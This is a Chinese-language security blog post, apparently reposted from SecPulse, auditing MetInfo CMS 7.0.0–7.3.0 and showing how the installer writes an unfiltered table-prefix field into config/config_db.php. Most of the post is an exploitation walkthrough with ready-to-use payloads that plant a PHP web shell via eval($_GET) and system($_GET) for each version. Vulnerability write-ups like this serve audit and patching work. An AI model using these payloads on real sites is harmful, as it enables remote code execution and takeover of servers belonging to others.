米拓建站系统1day审计与利用
作者:admin | 时间:2021-7-13 13:06:49 | 分类:黑客技术 隐藏侧边栏展开侧边栏
Metinfocms命令执行
前话:
审计过程:
2.关键词:在/app/system/entrance.php看到了配置文件的定义,全局搜索这’PATH_CONFIG‘参数。
全局搜索并找到install/index.php文件下有这个参数,点击跟进查看。
在这个文件的219行有个是接收db数据库参数的方法。
官方说明“$_M”数组:
https://doc.metinfo.cn/dev/basics/basics75.html
这里是接收from数据的db_prefix参数。也就是“数据表前缀”内容的值。
往下发现是直接写入tableper然后赋值给config变量。
并在264行fopen打开/config/config_db.php进行没有安全过滤的字节流(fputs)方式的写入。
影响版本:7.3.0- 7.0.0
一、进行7.3.0安装步骤,访问http://127.0.0.1/install/index.php
二、选中传统安装继续下一步
三、数据库信息进行写shell
代码执行Payload:"*/@eval($_GET['1']);/*
命令执行Payload:"*/@system($_GET['1']);/*
代码执行:
点击保存进行下一步验证,出现这报错信息,可以查看configconfig_db.php文件。
成功写入
命令执行:
7.0.0版本:
7.1.0版本:
Payload:"*/@eval($_GET['1']);@system($_GET['2']);/*
7.2.0版本:
Payload:"*/@eval($_GET['1']);@system($_GET['2']);/*
推荐实操:MetInfo SQL注入
https://www.hetianlab.com/expc.do?ec=ECID269f-6dc2-4412-bbad-a27109b207cf&pk_campaign=weixin-wemedia#stu
通过该实验掌握MetInfo SQL注入漏洞的原因和利用方法,以及如何修复该漏洞。
本文作者:合天网安实验室
本文为安全脉搏专栏作者发布,转自:https://www.secpulse.com/archives/161903.html